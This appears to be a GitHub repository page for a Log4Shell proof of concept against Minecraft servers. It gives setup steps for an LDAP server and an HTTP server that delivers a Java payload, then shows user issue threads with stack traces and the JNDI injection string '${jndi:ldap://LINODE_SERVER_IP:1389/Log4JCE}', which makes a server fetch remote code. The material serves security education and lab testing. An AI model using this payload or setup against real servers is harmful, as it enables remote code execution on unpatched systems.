log4jminecraft

This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!

To run this project follow the following steps:

Clone the repository: git clone https://github.com/davidbombal/log4jminecraft.git
Run the script log4j.py (python3 log4j.py <ip_address> i.e. python3 log4j.py 192.168.1.132). This installs the prerequisite software, and also starts up the LDAP server.
Run the script jcomp_pyserv.py (python3 jcomp_pyserv.py). This compiles the Java payload to be ran, and also starts a python3 http.server.

Acknowledgement for contributions:

John Hammond : https://youtu.be/7qoPDq41xhQ
Moritz Bechler (For creating the Java Unmarshaller Security - MarshalSec) : https://github.com/mbechler/marshalsec
xiajun325 for clear instruction on how to use the MarshalSec tool : https://github.com/xiajun325/apache-log4j-rce-poc

Hello! Thank you very much for your work! As shown in the video, I deployed both python codes on Ubuntu 20.04 LTS using the Linode service, everything worked and it was written in one terminal: Listening on 0.0.0.0:1389 And in the other:

root@localhost:~/log4jminecraft# python3 jcomp_pyserv.py
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

I also created a Minecraft server on my PC at version 1.18.1(at first) and installed the Java Kit. After that I changed the variable in server.properties: online-mode=false I need this so that I can log in to the server with TLauncher.

After that, I entered the command in minecraft: ${jndi:ldap://LINODE_SERVER_IP:1389/Log4JCE} Nothing worked on version 1.18.1.

I also tried it on versions 1.17.1 and 1.8.8 (as in the video). In these cases, the LDAP signal reaches the server: But on the server with Minecraft there is a long error:

[13:27:52] [Server thread/INFO]: Done (0,720s)! For help, type "help" or "?"
[13:27:59] [Server thread/INFO]: maxet24[/192.168.56.1:29255] logged in with entity id 310 at (-245.78230860708862, 71.0, 115.72254226147197)
[13:27:59] [Server thread/INFO]: maxet24 joined the game
2021-12-19 13:29:20,809 ERROR An exception occurred processing Appender SysOut java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
        at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
        at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
        at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
        at net.minecraft.server.MinecraftServer.a(SourceFile:871)
        at lx.a(SourceFile:782)
        at lm.a(SourceFile:680)
        at ie.a(SourceFile:37)
        at ie.a(SourceFile:9)
        at fh$1.run(SourceFile:13)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at g.a(SourceFile:44)
        at net.minecraft.server.MinecraftServer.B(SourceFile:579)
        at ko.B(SourceFile:299)
        at net.minecraft.server.MinecraftServer.A(SourceFile:535)
        at net.minecraft.server.MinecraftServer.run(SourceFile:451)
        at java.base/java.lang.Thread.run(Thread.java:833)

2021-12-19 13:29:20,974 ERROR An exception occurred processing Appender File java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
        at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:45)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:111)
        at org.apache.logging.log4j.core.appender.RollingRandomAccessFileAppender.append(RollingRandomAccessFileAppender.java:96)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
        at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
        at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
        at net.minecraft.server.MinecraftServer.a(SourceFile:871)
        at lx.a(SourceFile:782)
        at lm.a(SourceFile:680)
        at ie.a(SourceFile:37)
        at ie.a(SourceFile:9)
        at fh$1.run(SourceFile:13)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at g.a(SourceFile:44)
        at net.minecraft.server.MinecraftServer.B(SourceFile:579)
        at ko.B(SourceFile:299)
        at net.minecraft.server.MinecraftServer.A(SourceFile:535)
        at net.minecraft.server.MinecraftServer.run(SourceFile:451)
        at java.base/java.lang.Thread.run(Thread.java:833)

2021-12-19 13:29:21,141 ERROR An exception occurred processing Appender ServerGuiConsole java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167)
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52)
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367)
        at org.apache.logging.log4j.core.Logger.log(Logger.java:110)
        at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011)
        at net.minecraft.server.MinecraftServer.a(SourceFile:871)
        at lx.a(SourceFile:782)
        at lm.a(SourceFile:680)
        at ie.a(SourceFile:37)
        at ie.a(SourceFile:9)
        at fh$1.run(SourceFile:13)
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        at g.a(SourceFile:44)
        at net.minecraft.server.MinecraftServer.B(SourceFile:579)
        at ko.B(SourceFile:299)
        at net.minecraft.server.MinecraftServer.A(SourceFile:535)
        at net.minecraft.server.MinecraftServer.run(SourceFile:451)
        at java.base/java.lang.Thread.run(Thread.java:833)

[13:29:21] [Server thread/FATAL]: Error executing task
java.util.concurrent.ExecutionException: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
        at java.base/java.util.concurrent.FutureTask.report(FutureTask.java:122) ~[?:?]
        at java.base/java.util.concurrent.FutureTask.get(FutureTask.java:191) ~[?:?]
        at g.a(SourceFile:45) [minecraft_server.1.8.8.jar:?]
        at net.minecraft.server.MinecraftServer.B(SourceFile:579) [minecraft_server.1.8.8.jar:?]
        at ko.B(SourceFile:299) [minecraft_server.1.8.8.jar:?]
        at net.minecraft.server.MinecraftServer.A(SourceFile:535) [minecraft_server.1.8.8.jar:?]
        at net.minecraft.server.MinecraftServer.run(SourceFile:451) [minecraft_server.1.8.8.jar:?]
        at java.base/java.lang.Thread.run(Thread.java:833) [?:?]
Caused by: org.apache.logging.log4j.core.appender.AppenderLoggingException: An exception occurred processing Appender ServerGuiConsole
        at org.apache.logging.log4j.core.appender.DefaultErrorHandler.error(DefaultErrorHandler.java:73) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:101) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) [minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.Logger.log(Logger.java:110) [minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) [minecraft_server.1.8.8.jar:?]
        at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
        at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
        at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
        at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
        at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
        at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
        at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
        ... 5 more
Caused by: java.lang.ClassCastException: class javax.naming.Reference cannot be cast to class java.lang.String (javax.naming.Reference is in module java.naming of loader 'bootstrap'; java.lang.String is in module java.base of loader 'bootstrap')
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:58) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:121) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:904) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:825) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:737) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:306) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:167) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:52) ~[minecraft_server.1.8.8.jar:?]
        at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:425) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:406) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.core.Logger.log(Logger.java:110) ~[minecraft_server.1.8.8.jar:?]
        at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1011) ~[minecraft_server.1.8.8.jar:?]
        at net.minecraft.server.MinecraftServer.a(SourceFile:871) ~[minecraft_server.1.8.8.jar:?]
        at lx.a(SourceFile:782) ~[minecraft_server.1.8.8.jar:?]
        at lm.a(SourceFile:680) ~[minecraft_server.1.8.8.jar:?]
        at ie.a(SourceFile:37) ~[minecraft_server.1.8.8.jar:?]
        at ie.a(SourceFile:9) ~[minecraft_server.1.8.8.jar:?]
        at fh$1.run(SourceFile:13) ~[minecraft_server.1.8.8.jar:?]
        at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
        at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
        at g.a(SourceFile:44) ~[minecraft_server.1.8.8.jar:?]
        ... 5 more
[13:30:17] [Server thread/INFO]: maxet24 lost connection: TextComponent{text='Disconnected', siblings=[], style=Style{hasParent=false, color=null, bold=null, italic=null, underlined=null, obfuscated=null, clickEvent=null, hoverEvent=null, insertion=null}}

Nothing reached the HTTP server.

The request does not reach the HTTP server.

opened by Maxet24 13

ldap server can't reach http server

ldap and http are on the same server. I can access http server cia the web (it shows all files and I can download them), but ldap connections doesn't make it to the http.

Writing in chat: ${jndi:ldap://xxx.xxx.xxx.xxx:1389/Log4jRCE} gives to the console:

opened by ItsVaidas 11
error python3 jcomp_pyserv.py

Traceback (most recent call last): File "jcomp_pyserv.py", line 9, in subprocess.run(["javac", "Log4jRCE.java"]) File "/usr/lib/python3.8/subprocess.py", line 493, in run with Popen(*popenargs, **kwargs) as process: File "/usr/lib/python3.8/subprocess.py", line 858, in init self._execute_child(args, executable, preexec_fn, close_fds, File "/usr/lib/python3.8/subprocess.py", line 1704, in _execute_child raise child_exception_type(errno_num, err_msg, err_filename) FileNotFoundError: [Errno 2] No such file or directory: 'javac'

opened by congaterori 3
"Reference Class Name: foo"

It might not be an issue of the POC, but I get this message whenever I try to use it with a Minecraft 1.15.2 server:

[18:40:51] [Server thread/INFO]: Reference Class Name: foo

🤯

opened by ehguille 1

Could not find or load main class marshalsec.jndi.LDAPRefServer

fatal: destination path 'marshalsec' already exists and is not an empty directory.
['src', 'LICENSE.txt', '.gitignore', 'README.md', 'marshalsec.pdf', 'pom.xml', '.git']
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Error: Could not find or load main class marshalsec.jndi.LDAPRefServer
Caused by: java.lang.ClassNotFoundException: marshalsec.jndi.LDAPRefServer

I don't know why I am getting this error please help! I just installed all the stuff on a Kali virtuall machine.

opened by Benomat 0

Refine Java setup to be backward compatible

Java installation would skip if a newer version of Java is installed. Now we check for the specific java file needed. Also will no longer change the system's symbolic links to keep a lower impact workspace and call the java file directly instead

opened by ehlewis 0
Ldap server to http server redirection error

I have followed all the steps correctly and have almost gotten there. I hosted a vulnerable minecraft server on my pc in the same network, connected to it, and ran the ${jndi:ldap://:port/log4jRCE} (not accurate) code in the minecraft chat. I get to see an ldap server reply thrice on my kali vm but nothing on the web server terminal and the netcat terminal window

Any fixes? Thanks.

opened by NotMifa 1